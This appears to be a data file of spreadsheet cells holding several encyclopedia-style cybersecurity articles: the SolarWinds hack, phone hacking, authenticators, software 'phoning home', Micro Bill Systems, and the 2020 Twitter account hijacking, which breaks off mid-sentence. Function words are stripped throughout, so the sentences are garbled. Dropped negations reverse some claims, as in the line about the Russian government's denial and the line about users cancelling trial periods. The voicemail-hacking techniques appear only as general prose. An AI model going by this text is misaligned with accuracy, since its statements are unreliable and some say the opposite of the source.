breach tool theft.after discovering attack, fireeye reported u.s. national security agency (nsa), federal agency responsible helping defend u.s. cyberattacks. known aware attack notified fireeye. uses solarwinds software itself.some days later, december breaches treasury department commerce publicly confirmed exist, sources said fireeye breach related. december fireeye confirmed vector used attack treasury government departments used attack fireeye: trojaned software update solarwinds orion.the security community shifted attention orion. infected versions found 2019.4 2020.2.1 hf1, released march 2020 june 2020. fireeye named malware sunburst. microsoft called solorigate. tool attackers used insert sunburst orion updates later isolated cybersecurity firm crowdstrike, called sunspot.subsequent analysis solarwinds compromise using data reverse engineering orion binaries, domaintools reversinglabs respectively, revealed additional details attacker's timeline.july 2021 analysis published google threat analysis group found "likely russian government-backed actor" exploited zero-day vulnerability fully-updated iphones steal authentication credentials sending messages government officials linkedin. vmware exploits some time december 2020, discovered notified vmware vulnerabilities vmware access vmware identity manager. vmware released patches december 2020. december 2020, published advisory warning customers apply patches vulnerabilities actively exploited russian state-sponsored attackers. responsibility conclusions investigators solarwinds said believed malware insertion orion performed foreign nation. russian-sponsored hackers suspected responsible. u.s. officials stated specific groups responsible probably cozy bear (also known apt29). fireeye gave suspects placeholder name "unc2452"; incident response firm volexity called "dark halo". december 2020, fireeye said russia likely culprit attacks "very consistent" svr. security researcher offers likely operational date, february 2020, significant change aspect october 2020.in january 2021, cybersecurity firm kaspersky said sunburst resembles malware kazuar, believed created turla, group known 2008 estonian intelligence previously linked russian federal security service, fsb. statements u.s. government officials october 2020, cisa identified microsoft zerologon attacker berserk bear, state-sponsored group believed part russia's fsb.on december u.s. secretary state mike pompeo said russia "pretty clearly" responsible cyber attack.on december u.s. president donald trump publicly addressed attacks first time, downplaying severity suggesting without evidence china, rather russia, might responsible. day, republican senator marco rubio, acting chair senate intelligence committee, said "increasingly clear russian intelligence conducted gravest cyber intrusion history."on december democratic senator mark warner, briefed incident intelligence officials, said "all indications point russia."on december 2020, former attorney general william barr said agreed pompeo's assessment origin cyberhack "certainly appears russians," contradicting trump.on january 2021, cisa, fbi, nsa, office director national intelligence, confirmed believe russia likely culprit. june 2021, director christopher wray attributed attack russia's specifically. denial involvement russian government said involved.the chinese foreign ministry said statement, "china resolutely opposes combats form cyberattacks cyber theft." impact solarwinds said 300,000 customers, 33,000 orion. these, around 18,000 government private users downloaded compromised versions.discovery breaches u.s. treasury commerce departments immediately raised concerns attackers would attempt breach departments, already done further investigation proved concerns well-founded. within days, additional federal departments found breached. reuters quoted anonymous u.s. government source saying: “this much bigger story single agency. this huge cyber espionage campaign targeting u.s. government interests.”compromised versions known downloaded centers disease control prevention, justice department, utility companies. other prominent u.s. organisations known solarwinds products, though necessarily orion, alamos national laboratory, boeing, fortune companies. outside u.s., reported solarwinds clients included parts british government, including home office, national health service, signals intelligence agencies; north atlantic treaty organization (nato); european parliament; likely astrazeneca. fireeye said additional government, consulting, technology, telecom extractive entities north america, europe, asia middle east also affected.through manipulation software keys, hackers able access email systems used treasury department's highest-ranking officials. this system, although unclassified, highly sensitive treasury department's role making decisions move market, well decisions economic sanctions interactions federal reserve.simply downloading compromised version orion necessarily sufficient result data breach; investigation required case establish whether breach resulted. these investigations complicated fact attackers cases removed evidence; need maintain separate secure networks organizations' main networks assumed compromised; fact orion network monitoring tool, without users less visibility networks. mid-december 2020, investigations ongoing.as mid-december 2020, u.s. officials still investigating stolen cases breaches occurred, trying determine could used. commentators said information stolen attack would increase perpetrator's influence years come. possible future uses could include attacks hard targets like nsa, using blackmail recruit spies. cyberconflict professor thomas said stolen data would myriad uses. added amount data taken likely many times greater moonlight maze, printed would form stack taller washington monument.even data exfiltrated, impact significant. cybersecurity infrastructure security agency (cisa) advised affected devices rebuilt trusted sources, credentials exposed solarwinds software considered compromised therefore reset. anti-malware companies additionally advised searching files specific indicators compromise.however, appeared attackers deleted altered records, modified network system settings ways could require manual review. former homeland security advisor thomas bossert warned could take years evict attackers networks, leaving able continue monitor, destroy tamper data meantime. harvard's bruce schneier, nyu's pano yannakogeorgos, founding dean force cyber college, said affected networks need replaced completely.the justice department disclosed july 2021 federal prosecutors' offices around country affected, including microsoft email accounts breached four york offices. offices, manhattan brooklyn, handle many prominent investigations white-collar crime, well people close former president trump. list confirmed connected data breaches u.s. federal government u.s. state local governments private sector investigations responses technology companies business december 2020, organizations known breached, fireeye published countermeasures team tools stolen fireeye.on december 2020, microsoft announced sunburst, affects windows platforms, added microsoft's malware database would, december onwards, detected quarantined microsoft defender.godaddy handed ownership microsoft command-and-control domain used attack, allowing microsoft activate killswitch sunburst malware, discover solarwinds customers infected.on december 2020, ceos several american utility companies convened discuss risks posed power grid attacks. december 2020, north american electric reliability corporation asked electricity companies report level exposure solarwinds software.solarwinds unpublished featured customer list hack, although december cybersecurity firm greynoise intelligence said solarwinds removed infected software updates distribution server.around january 2021, solarwinds investors filed class action lawsuit company relation security failures subsequent fall share price. soon after, solarwinds hired cybersecurity firm co-founded krebs.the linux foundation pointed orion open source, users would able audit including reproducible builds, making much likely malware payload would spotted. u.s. government december 2020, u.s. secretary state mike pompeo said details event would likely classified become public. security agencies december 2020, national security council (nsc) meeting held white house discuss breach federal organizations. december 2020, cisa issued emergency directive asking federal agencies disable solarwinds software, reduce risk additional intrusions, even though would reduce agencies' ability monitor computer networks. russian government said involved attacks.on december 2020, department commerce confirmed asked cisa investigate. activated presidential policy directive obama-era emergency plan, convened cyber response group. u.s. cyber command threatened swift retaliation attackers, pending outcome investigations.the helped compensate staffing shortfall cisa allocating resources help federal energy regulatory commission (ferc) recover cyberattack. fbi, cisa, office director national intelligence (odni) formed cyber unified coordination group (ucg) coordinate efforts.on december 2020, cisa said state local government networks, addition federal ones, organizations, impacted attack, provide details. congress senate armed services committee's cybersecurity subcommittee briefed defense department officials. house committee homeland security house committee oversight reform announced investigation. marco rubio, acting chair senate intelligence committee, said u.s. must retaliate, perpetrator certain. committee's vice-chairman, mark warner, criticized president trump failing acknowledge react hack.senator wyden called mandatory security reviews software used federal agencies.on december 2020, u.s. treasury secretary steven mnuchin told reporters "completely this", senate finance committee briefed microsoft dozens treasury email accounts breached, attackers accessed systems treasury's departmental offices division, home treasury officials. senator wyden said briefing showed treasury "still know actions taken hackers, precisely information stolen".on december 2020, senator menendez asked state department silence extent breach, senator richard blumenthal asked veterans administration. judiciary administrative office united states courts initiated audit, dhs, u.s. judiciary's case management/electronic case files (cm/ecf) system. stopped accepting highly sensitive court documents cm/ecf, requiring instead accepted paper form airgapped devices. president trump president donald trump made comment hack days reported, leading senator mitt romney decry "silence inaction". december trump publicly addressed attacks first time; downplayed hack, contended media overblown severity incident, said "everything well control"; proposed, without evidence, china, rather russia, might responsible attack. trump pivoted insisting 2020 presidential election. speculated, without evidence, attack might also involved "hit" voting machines, part long-running campaign trump falsely assert 2020 election. trump's claim rebutted former cisa director chris krebs, pointed trump's claim possible. adam schiff, chair house intelligence committee, described trump's statements dishonest, calling comment "scandalous betrayal national security" "sounds like could written kremlin."former homeland security advisor thomas bossert said, "president trump verge leaving behind federal government, perhaps large number major industries, compromised russian government," noted congressional action, including national defense authorization would required mitigate damage caused attacks. president biden then president-elect biden said would identify penalize attackers. biden's incoming chief staff, klain, said biden administration's response hack would extend beyond sanctions. december 2020, biden reported transition team still denied access briefings attack trump administration officials.in january 2021, biden named appointees relevant white house positions: elizabeth sherwood-randall homeland security adviser, anne neuberger deputy national security adviser cyber emerging technology.in march 2021, biden administration expressed growing concerns hack, white house press secretary psaki called active threat”. meanwhile york times reported government planning economic sanctions well series clandestine actions across russian networks" retaliation.on april 2021, united states expelled russian diplomats issued sanctions russian companies support cyber operations, well individuals entities role hack russian interference 2020 united states elections. rest world nato said "currently assessing situation, view identifying mitigating potential risks networks." december united kingdom national cyber security centre said still establishing attacks' impact irish cybersecurity agencies published alerts targeting solarwinds customers.on december 2020, information commissioner's office national privacy authority told organizations check immediately whether impacted.on december 2020, canadian centre cyber security asked solarwinds orion users canada check system compromises. cyber espionage cyberattack? attack prompted debate whether hack treated cyber espionage, cyberattack constituting war. most current former u.s. officials considered 2020 russian hack "stunning distressing feat espionage" cyberattack russians appear destroy manipulate data cause physical damage (for example, electrical grid). erica borghard atlantic council columbia's saltzman institute jacquelyn schneider hoover institution naval college argued breach espionage could responded "arrests, diplomacy, counterintelligence" shown cyberattack, classification would legally allow u.s. respond force. professor jack goldsmith wrote hack damaging cyber-espionage "does violate international norms" wrote "because practices, u.s. government traditionally accepted legitimacy foreign governmental electronic spying u.s. government networks." professor michael schmitt concurred, citing tallinn manual.by contrast, microsoft president brad smith termed hack cyberattack, stating "not 'espionage usual,' even digital age" "not attack specific targets, trust reliability world's critical infrastructure." u.s. senator richard durbin (d-il) described attack tantamount declaration war. debate possible u.s. responses writing wired, borghard schneider opined u.s. "should continue build rely strategic deterrence convince states weaponize cyber intelligence collect". they also stated deterrence effectively discourage cyber-espionage attempts threat actors, u.s. also focus making cyber-espionage less successful methods enhanced cyber-defenses, better information-sharing, "defending forward" (reducing russian chinese offensive cyber-capabilities).writing dispatch, goldsmith wrote failure defense deterrence strategies cyber-intrusion prompt consideration "mutual restraint" strategy, "whereby united states agrees curb certain activities foreign networks exchange forbearance adversaries networks."cybersecurity author bruce schneier advocated retaliation increases offensive capabilities, proposing instead adoption defense-dominant strategy ratification paris call trust security cyberspace global commission stability cyberspace.in york times, paul kolbe, former agent director intelligence project harvard's belfer center science international affairs, echoed schneier's call improvements u.s.'s cyberdefenses international agreements. also noted engaged similar operations countries described ambient cyber-conflict. also cyberwarfare united states cyberwarfare russia eternalblue global surveillance disclosures (2013–present) list data breaches moonlight maze office personnel management data breach security dilemma shadow brokers 2008 cyberattack united states 2021 microsoft exchange server data breach references external links solarwinds security advisory fireeye research report guidepoint security analysis russian targets u.s. allied networks (pdf file) 'worst nightmare' cyberattack: untold story solarwinds hack dina temple-raston, friday, april 2021 (npr text version)</t>
  </si>
  <si>
    <t>Phone hacking</t>
  </si>
  <si>
    <t>phone hacking practice exploring mobile device often using computer exploits analyze everything lowest memory central processing unit levels highest file system process levels. modern open source tooling become fairly sophisticated able "hook" individual functions within running unlocked device allow deep inspection modification functions. phone hacking large branch computer security includes studying various situations exactly attackers security exploits gain level access mobile device variety situations presumed access levels. term came prominence news international phone hacking scandal, alleged (and cases proved court) british tabloid newspaper news world involved interception voicemail messages british royal family, public figures, murdered schoolgirl named milly dowler. victims phone hacking although mobile phone users targeted, "for famous, rich powerful whose prize important enough (for whatever reason) devote time resources make concerted attack, usually common, real risks face." techniques voicemail hacking unauthorized remote access voicemail systems, exposed news international phone hacking scandal, possible weaknesses implementations systems telcos.some pabx systems distant voicemail feature, accessed entering password initial greeting played. hacker call direct dial number voicemail, default password guess select "call back" function, enter premium rate number callback. pabx calls back premium rate line, confirming password hacker. stop form hacking, call back feature pabx turned off, strong password used. mobile phone voicemail messages accessed landline telephone entry personal identification number (pin). service provider commonly sets four-digit default rarely changed phone's owner. hacker knows phone number default access voicemail messages associated service. even default known, social engineering used reset voicemail code default impersonating owner phone call call centre. many people also weak pins easy guess. prevent subscribers choosing pins weak password strength, mobile phone companies disallow consecutive repeat digits voicemail codes.during mid-2000s, discovered calls emanating handset registered voicemail account would straight voicemail without need pin. hacker could caller spoofing impersonate target's handset caller thereby gain access associated voicemail without pin.following controversies phone hacking criticism leveled mobile service providers allowed access voicemail without pin, many mobile phone companies strengthened default security systems remote access voicemail messages phone settings longer achieved even default pin. example, at&amp;t announced august 2011 wireless subscribers would required enter checking voicemail, even checking phones, t-mobile stated "recommends turn voice mail password added security, always, choice yours." handsets analysis user-selected codes suggested numbers represent iphone passcodes, "1234" "0000" common, years birth graduation also common choices. even four-digit randomly selected, space small {\displaystyle 10^{4}} 10,000 possibilities), making pins significantly easier brute force passwords; someone physical access handset secured therefore feasibly determine short time.mobile phone microphones activated remotely security agencies telcos, without need physical access, long battery removed. this "roving bug" feature used enforcement agencies intelligence services listen nearby conversations.other techniques phone hacking include tricking mobile phone user downloading malware monitors activity phone. bluesnarfing unauthorized access phone bluetooth. other there flaws implementation encryption algorithm allow passive interception. equipment needed available government agencies built freely available parts.in december 2011, german researcher karsten nohl revealed possible hack mobile phone voice text messages many networks free decryption software available internet. blamed mobile phone companies relying outdated encryption techniques system, said problem could fixed easily. legality phone hacking, form surveillance, illegal many countries unless carried lawful interception government agency. news international phone hacking scandal, private investigator glenn mulcaire found violated regulation investigatory powers 2000. sentenced months prison january 2007. renewed controversy phone-hacking claims closure news world july 2011.in december 2010, truth caller signed united states law, making illegal cause caller identification service knowingly transmit misleading inaccurate caller identification information intent defraud, cause harm, wrongfully obtain anything value." also mobile security operation weeting phreaking telephone tapping vault references external links phone hacking collected news commentary guardian today someone hacked webcam, march 2018 cell hack spanish hacking, timeline: news world phone-hacking row, news, july 2011 full phone hacking scandal, news, july 2011 anatomy phone-hacking scandal, york times, september 2010 rise caller spoofing, wall street journal, february 2010 phone hacking: safe?, rory cellan-jones, news, july 2011 should cover phone camera, bustle 2018</t>
  </si>
  <si>
    <t>Authenticator</t>
  </si>
  <si>
    <t>authenticator means used confirm user's identity, perform digital authentication. person authenticates computer system application demonstrating possession control authenticator. simplest case, authenticator common password. using terminology nist digital identity guidelines, party authenticated called claimant party verifying identity claimant called verifier. when claimant successfully demonstrates possession control authenticators verifier established authentication protocol, verifier able infer claimant's identity. classification authenticators characterized terms secrets, factors, physical forms. authenticator secrets every authenticator associated least secret claimant uses demonstrate possession control authenticator. since attacker could secret impersonate user, authenticator secret must protected theft loss. type secret important characteristic authenticator. there three basic types authenticator secret: memorized secret types cryptographic keys, either symmetric private key. memorized secret memorized secret intended memorized user. well-known example memorized secret common password, also called passcode, passphrase, personal identification number (pin). authenticator secret known claimant verifier called shared secret. example, memorized secret shared. symmetric shared definition. private shared. important type secret memorized shared password. special case password, authenticator secret. cryptographic cryptographic authenticator uses cryptographic key. depending material, cryptographic authenticator symmetric-key cryptography public-key cryptography. both avoid memorized secrets, case public-key cryptography, shared secrets well, important distinction. examples cryptographic authenticators include oath authenticators fido authenticators. counterexample, password authenticator cryptographic authenticator. #examples section details. symmetric symmetric shared secret used perform symmetric-key cryptography. claimant stores copy shared dedicated hardware-based authenticator software-based authenticator implemented smartphone. verifier holds copy symmetric key. public-private pair public-private pair used perform public-key cryptography. public known (and trusted verifier corresponding private bound securely authenticator. case dedicated hardware-based authenticator, private never leaves confines authenticator. authenticator factors forms authenticator something unique distinctive user (something has), activated either (something knows), biometric ("something unique oneself"). authenticator provides factors called single-factor authenticator whereas multi-factor authenticator incorporates factors. multi-factor authenticator achieve multi-factor authentication. combination single-factor authenticators multi-factor authentication, suitable certain conditions. authenticators take variety physical forms (except memorized secret, intangible). can, example, hold authenticator one's hand wear face, wrist, finger.it convenient describe authenticator terms hardware software components. authenticator hardware-based software-based depending whether secret stored hardware software, respectively. important type hardware-based authenticator called security key, also called security token (not confused access tokens, session tokens, types security tokens). security stores secret hardware, prevents secret exported. security also resistant malware since secret time accessible software running host machine. software-based authenticator (sometimes called software token) implemented general-purpose electronic device laptop, tablet computer, smartphone. example, software-based authenticator implemented mobile claimant's smartphone type phone-based authenticator. prevent access secret, software-based authenticator processor's trusted execution environment trusted platform module (tpm) client device. platform authenticator built particular client device platform, implemented device. contrast, roaming authenticator cross-platform authenticator implemented device. roaming authenticator connects device platform transport protocol usb. examples following sections describe narrow classes authenticators. comprehensive classification, nist digital identity guidelines. single-factor authenticators authenticator, claimant must explicitly indicate intent authenticate. example, following gestures sufficient establish intent: claimant types password password field, claimant places finger fingerprint reader, claimant presses button indicate approvalthe latter called test user presence (tup). activate single-factor authenticator (something has), claimant required perform tup, avoids unintended operation authenticator. password secret intended memorized claimant shared verifier. password authentication process whereby claimant demonstrates knowledge password transmitting network verifier. transmitted password agrees previously shared secret, user authentication successful. oath one-time passwords (otps) used since 1980s. 2004, open authentication reference architecture secure generation otps announced annual conference. initiative open authentication (oath) launched year later. ietf standards grew work, hmac-based one-time password (hotp) algorithm time-based one-time password (totp) algorithm specified 4226 6238, respectively. oath otp, mean either hotp totp. oath certifies conformance hotp totp standards.a traditional password (something knows) often combined one-time password (something has) provide two-factor authentication. both password transmitted network verifier. password agrees previously shared secret, verifier confirm value otp, user authentication successful. one-time passwords generated demand dedicated oath authenticator encapsulates secret previously shared verifier. using authenticator, claimant generates using cryptographic method. verifier also generates using cryptographic method. values match, verifier conclude claimant possesses shared secret. well-known example oath authenticator open-source google authenticator, phone-based authenticator implements hotp totp. mobile push mobile push authenticator essentially native running claimant's mobile phone. uses public-key cryptography respond push notifications. words, mobile push authenticator single-factor cryptographic software authenticator. mobile push authenticator (something has) usually combined password (something knows) provide two-factor authentication. unlike one-time passwords, mobile push require shared secret beyond password. after claimant authenticates password, verifier makes out-of-band authentication request trusted third party manages public-key infrastructure behalf verifier. trusted third party sends push notification claimant's mobile phone. claimant demonstrates possession control authenticator pressing button user interface, authenticator responds digitally signed assertion. trusted third party verifies signature assertion returns authentication response verifier. proprietary mobile push authentication protocol runs out-of-band secondary channel, provides flexible deployment options. since protocol requires open network path claimant's mobile phone, path available (due network issues, e.g.), authentication process proceed. fido fido universal factor (u2f) authenticator (something has) single-factor cryptographic authenticator intended used conjunction ordinary password. since authenticator relies public-key cryptography, require additional shared secret beyond password. access authenticator, claimant required perform test user presence (tup), helps prevent unauthorized access authenticator's functionality. practice, consists simple button push. authenticator interoperates conforming user agent implements javascript api. authenticator necessarily implements ctap1/u2f protocol, protocols specified fido client authenticator protocol.unlike mobile push authentication, authentication protocol runs entirely front channel. round trips required. first round trip ordinary password authentication. after claimant authenticates password, verifier sends challenge conforming browser, communicates authenticator custom javascript api. after claimant performs tup, authenticator signs challenge returns signed assertion verifier browser. multi-factor authenticators multi-factor authenticator, claimant performs full user verification. multi-factor authenticator (something has) activated (something knows), biometric (something unique oneself"; e.g. fingerprint, face voice recognition), verification technique. card withdraw cash automated teller machine (atm), bank customer inserts card cash machine types personal identification number (pin). input compared stored card's chip. match, withdrawal proceed. note withdrawal involves memorized secret (i.e., pin) true value secret known advance. machine blindly passes input card, compares customer's input secret stored card's chip. match, card reports success transaction continues. card example multi-factor authenticator. card something stored card's chip presumably something knows. presenting card demonstrating knowledge kind multi-factor authentication. secure shell secure shell (ssh) client-server protocol uses public-key cryptography create secure channel network. contrast traditional password, cryptographic authenticator. primary authenticator secret private key, used client digitally sign message. corresponding public used server verify message signature, confirms claimant possession control private key. avoid theft, private (something has) encrypted using passphrase (something knows). initiate two-factor authentication process, claimant supplies passphrase client system. like password, passphrase memorized secret similarity ends. whereas password shared secret transmitted network, passphrase shared, moreover, passphrase strictly confined client system. authentication example passwordless authentication since avoids transmission shared secret network. fact, authentication require shared secret all. fido2 fido protocol standard became starting point fido2 project, joint effort world wide consortium (w3c) fido alliance. project deliverables include authentication (webauthn) standard fido client authenticator protocol (ctap). together webauthn ctap provide strong authentication solution web. fido2 authenticator, also called webauthn authenticator, uses public-key cryptography interoperate webauthn client, conforming user agent implements webauthn javascript api. authenticator platform authenticator, roaming authenticator, combination two. example, fido2 authenticator implements ctap2 protocol roaming authenticator communicates webauthn client following transport options: usb, near-field communication (nfc), bluetooth energy (ble). concrete examples fido2 platform authenticators include windows hello android operating system.a fido2 authenticator used either single-factor mode multi-factor mode. single-factor mode, authenticator activated simple test user presence (e.g., button push). multi-factor mode, authenticator (something has) activated either (something knows) biometric ("something unique oneself"). security code first foremost, strong authentication begins multi-factor authentication. best thing protect personal online account enable multi-factor authentication. there ways achieve multi-factor authentication: multi-factor authenticator combination single-factor authenticatorsin practice, common approach combine password authenticator (something knows) authenticator (something has) cryptographic authenticator. generally speaking, cryptographic authenticator preferred authenticator cryptographic methods. else equal, cryptographic authenticator uses public-key cryptography better uses symmetric-key cryptography since latter requires shared keys (which stolen misused). again else equal, hardware-based authenticator better software-based authenticator since authenticator secret presumably better protected hardware. this preference reflected nist requirements outlined next section. nist authenticator assurance levels nist defines three levels assurance respect authenticators. highest authenticator assurance level (aal3) requires multi-factor authentication using either multi-factor authenticator appropriate combination single-factor authenticators. aal3, least authenticators must cryptographic hardware-based authenticator. given basic requirements, possible authenticator combinations used aal3 include: multi-factor cryptographic hardware-based authenticator single-factor cryptographic hardware-based authenticator used conjunction authenticator (such password authenticator)see nist digital identity guidelines discussion authenticator assurance levels. restricted authenticators like authenticator assurance levels, notion restricted authenticator nist concept. term refers authenticator demonstrated inability resist attacks, puts reliability authenticator doubt. federal agencies mitigate restricted authenticator offering subscribers alternative authenticator restricted developing migration plan event restricted authenticator prohibited point future. currently, public switched telephone network restricted nist. particular, out-of-band transmission one-time passwords (otps) recorded voice messages messages restricted. moreover, agency chooses voice- sms-based otps, agency must verify transmitted phone address since voice (voip) accounts routinely protected multi-factor authentication. comparison convenient passwords basis comparison since widely understood password. computer systems, passwords used since least early 1960s. more generally, passwords used since ancient times.in 2012, bonneau evaluated decades proposals replace passwords systematically comparing passwords competing authentication schemes terms usability, deployability, security. (the cited technical report extended version peer-reviewed paper name.) they found schemes better passwords security every scheme worse passwords deployability. terms usability, schemes better schemes worse passwords. google used evaluation framework bonneau compare security keys passwords one-time passwords. they concluded security keys usable deployable one-time passwords, secure passwords one-time passwords. also electronic authentication references</t>
  </si>
  <si>
    <t>Phoning home</t>
  </si>
  <si>
    <t>computing, phoning home term often used refer behavior security systems report network location, username, data another computer. phoning home useful proprietor tracking missing stolen computer. this type phoning home frequently used mobile computers corporations. typically involves software agent difficult detect remove. however, malicious types phoning homes surreptitious communication applications hardware installed end-user sites manufacturers developers. traffic encrypted make difficult impractical end-user determine data transmitted.the stuxnet attack iran's nuclear facilities facilitated phone home technology reported york times. legal phoning home there uses phoning home practice legal countries. example, phoning home could purposes access restriction, transmitting authorization key. this done adobe creative suite. each time programs opened, phones home serial number. serial number listed already use, fake, program present user option inputting correct serial number. user refuses, next time program loads, operate trial mode valid serial number input. however, method thwarted either disabling internet connection starting program adding firewall hosts file rule prevent program communicating verification server.phoning home could also marketing purposes, "sony rootkit", transmits hash currently playing back sony, digital video recorder (dvr) reporting viewing habits. high-end computing systems mainframes 'phone home' capabilities many years, alert manufacturer hardware problems mainframes disk storage subsystems (this enables repair maintenance performed quickly even proactively maintenance contract). similarly, high-volume copy machines long equipped phone-home capabilities, billing preventive/predictive maintenance purposes.in research computing, phoning home used track daily usage open source academic software. this phoning used develop logs purposes justification grant proposals support ongoing funding projects. aside malicious software phoning home, phoning home done track computer assets—especially mobile computers. well-known software applications leverage phoning home tracking absolute software's computrace. this software employs agent calls absolute-managed server regular intervals information companies police locate missing computer. more phone-home uses other phoning home (website) applications' authors, applications allow documents thing, thus allowing documents' authors trigger (essentially anonymous) tracking setting connection intended logged. such behavior, example, caused v7.0.5 adobe reader interactive notification whenever file tries phoning author's) home.html e-mail messages easily implement form "phoning home". images files required e-mail body generate extra requests remote server viewed. address user's computer sent webserver unavoidable process reply required), details embedded request urls identify user e-mail address, marketing campaign, etc. such extra page resources referred "web bugs" also used track off-line viewing uses ordinary pages. prevent activation requests, many e-mail clients load images resources html e-mails first viewed, giving users option load images e-mail trusted source. malicious phoning home there many malware applications "phone home" gather store information person's machine. example, pushdo trojan shows complexity modern malware applications phoning home capabilities systems. pushdo executables available sent infected windows client. surveillance cameras foscam reported security researcher brian krebs secretly phone home manufacturer. also digital rights management (drm) product activation spyware internet things references</t>
  </si>
  <si>
    <t>Micro Bill Systems</t>
  </si>
  <si>
    <t>micro bill systems, also known microbillsys, platte media, online collection service offices leeds, england, considered malware. company states professional billing company offering "software management solutions business reducing uncollectable payments." company's best-known clients online gambling pornography sites offering three-day free trials subscription-based services. users cancel trial period, software begins repeating cycle full-screen pop-up windows warning users account overdue demanding payment. eleven-page end-user license agreement contains clause stating unless bill paid, software disrupt computer longer day, four daily periods minutes pop-up payment demand locked cannot closed minimized. users complained unexpected bills, feel victimized, deny ever accessing video sites billed for. denies installing software stealthy means says software downloaded consent. many consumers unaware agreed download.security software company symantec describes microbillsys potentially unwanted application uses aggressive billing collection techniques demand payment three-day trial period, says reports techniques leaving computer unable browse internet. operation when user first accesses online service whose collections managed mbs, sign-up software creates unique identifier based user's computer configuration address. this identifier permits maintain history user access supported sites send billing notices directly user's computer without consumer ever entered name, credit card number, personal information.the billing notices take form repeating pop-up windows warning users account overdue demanding payment 30-day subscription. typical amounts £19.95 (us$35.00) £29.95 (us$52.50). pop-ups cover substantial area screen often cannot closed, effectively preventing computer minutes. their number frequency increases time, stop consumers must pay. according company's terms conditions, agreement canceled software uninstalled balance outstanding.for pay, platte sends letters addressed "the computer owner" threatening legal action small claims court. letters, described recipient "sham county court notice", include "pre submission" information form could mislead unwary thinking comes "issuing court northampton county court". unclear platte derives street addresses addresses mailings, isps interviewed deny providing information. filling information form returning users provide platte full name addition correct mailing address. similarly, users complain platte email telephone asked names addresses uninstall codes mailed out. payment demands follow. later platte began using debt collection agency pressurise people making payments. cases, charge added 'subscription'. clients mbs's initial clients adult content sites. after acquired platte media (platte international) early 2008, company expanded include promise access hollywood movies getfilmsnow. film studios warner bros. 20th century sent getfilmsnow cease desist order, licensed films platte advertising.while platte's website presents company mainstream media distribution company, interview radio four programme yours ex-managing director mbs, ashley bateup, indicates bulk full videos site either black white, pornographic nature. consumer complaints uk's office fair trading (oft), charged promoting protecting consumer interests received numerous complaints pop-up payment demands consumers said realized agreeing billed. number stated pop-up software downloaded without computer used access client site. said acting interests consumers whose access sites confirmed, legal jurisdiction deal issue software downloaded without consent. position denies installing software stealthy means, says software downloaded consent users visit client site. malware researcher computer security company prevx found evidence surreptitious installations. journalist investigating complaints called installation process "unmistakable", download, clicking screens, entering four-digit number." among required steps acceptance eleven-page end-user license agreement includes clause:if choose ignore payment reminders membership fee, hereby understand acknowledge prompt reminders become frequent lose ability your computer submitted payment. payment reminders active computer online offline. company says looks complaints, usually member household downloaded software without reading terms conditions, billing pop-ups begin refuse admit computer owner. owner assumes computer somehow infected. company says "our customer service team's experience people seem move denial spouses partners pornography question."the software difficult non-technical users remove, part mutually protective executable files. company says software easy remove, many people would services already consumed. undertakings response complaints, office fair trading reviewed sign-up process fairness terms conditions. march 2008, announced mbs/platte media "undertakings", pledges, make sign-up process fair setting limits amount disruption pop-up payment demands could cause.the company promised make clear sign-up process customer entering contract, billing pop-ups appear trial period ends. they also promised provide information consumers 'pop-up' generating software uninstalled time".the company promised cause pop-ups, cause pop-up 24-hour period, cause pop-ups "beyond expiry weeks payment become due". they also promised cause locked-open pop-ups, cause locked-open pop-ups remain locked seconds. payment demands delivered pop-up windows restricted. statements authorities announcing undertakings, office fair trading's head consumer protection said believe [the undertakings] achieve right balance protecting consumer interests without stifling innovation 'on-line' market place."a local authority locale leeds office charged preventing exploitation vulnerable consumers, west yorkshire trading standards, received hundreds complaints pop-ups. spokesman authority said opinion time company operating within bounds existing legislation would difficult take formal legal action them."one woman whose family computer caught pop-up cycle interviewed guardian. wonders, company's activities indeed legitimate maintained west yorkshire trading standards, pressure office fair trading tighten law? shutdown march 2009, following protracted letterwriting campaign conducted platte/mbs victims forum martin horwood raised question house commons activities platte specifically number complaints received trading standards activities. response, informed platte ceased trading effect february 2009. specific reason given withdrawal, fair assume continued resistance british consumers regarded unfair business model must played part decision, along threat action revenue concerning possible non-payment vat. email michael pollitt, company said stopped operating "our reasons decision intentions simply related original marketing business model", adding: "obviously, like business would making sure stopping marketing market, done sensible orderly manner, best preserve interests customers own." also movieland similar business operating ransomware malware program prevents access files and/or computer unless paid. references external links pollitt, michael (may 2007). "legal wrangles porn billing software". guardian. london. micro bill systems legit ransomware? removing micro bill systems easypc company remove platte media</t>
  </si>
  <si>
    <t>2020 Twitter account hijacking</t>
  </si>
  <si>
    <t>july 2020, 20:00 22:00 utc, reportedly high-profile twitter accounts compromised outside parties promote bitcoin scam. twitter media sources confirmed perpetrators gained access twitter's administrative tools could alter accounts post tweets directly. they appeared used social engineering gain access tools twitter employees. three individuals arrested authorities july 2020, charged wire fraud, money laundering, identity theft, unauthorized computer access related scam.the scam tweets asked individuals send bitcoin currency specific cryptocurrency wallet, promise twitter user money sent would doubled returned charitable gesture. within minutes initial tweets, transactions already taken place wallet addresses, bitcoin value us$110,000 deposited account scam messages removed twitter. addition, full message history data eight non-verified accounts also acquired.dmitri alperovitch, co-founder cybersecurity company crowdstrike, described incident "the worst hack major social media platform yet." security researchers expressed concerns social engineering used execute hack could affect social media important online discussions, including lead-up 2020 united states presidential election. july 2020, u.s. department justice announced charges three individuals connection incident. incident forensic analysis scam showed initial scam messages first posted accounts short, one- two-character distinctive names, "@6". this followed cryptocurrency twitter accounts around 20:00 july 2020, including coinbase, coindesk binance. scam moved high-profile accounts first tweet sent elon musk's twitter account 20:17 utc. other apparently compromised accounts included well-known individuals barack obama, biden, bill gates, jeff bezos, mrbeast, michael bloomberg, warren buffett, floyd mayweather jr., kardashian, kanye west; companies apple, uber, cash app. twitter believed accounts affected, though actually used tweet scam message; accounts accessed scam least million followers.the tweets involved scam hack claimed sender, charity, would repay user double value bitcoin sent given wallets, often part covid-19 relief effort. tweets followed sharing malicious links number cryptocurrency companies; website hosting links taken shortly tweets posted. while "double bitcoin" scams common twitter before, first major instance sent breached high-profile accounts. security experts believe perpetrators scam "smash grab" operation: knowing intrusion accounts would closed quickly, perpetrators likely planned small fraction millions follow accounts needed fall scam short time make quick money multiple bitcoin wallets listed websites; first observed received bitcoins transactions, valued us$118,000, us$61,000 removed second amounts thousands dollars twitter took steps halt postings. unclear funds added scam, bitcoin scammers known funds wallets prior starting schemes make scam seem legitimate. funds added, originated wallets chinese ownerships, came united states wallets. after added, cryptocurrency subsequently transferred multiple accounts means obscure identity.some compromised accounts posted scam messages repeatedly, even messages deleted. tweets labelled sent using twitter app. phrases involved scam tweeted 3,000 times space four hours, tweets sent addresses linked many different 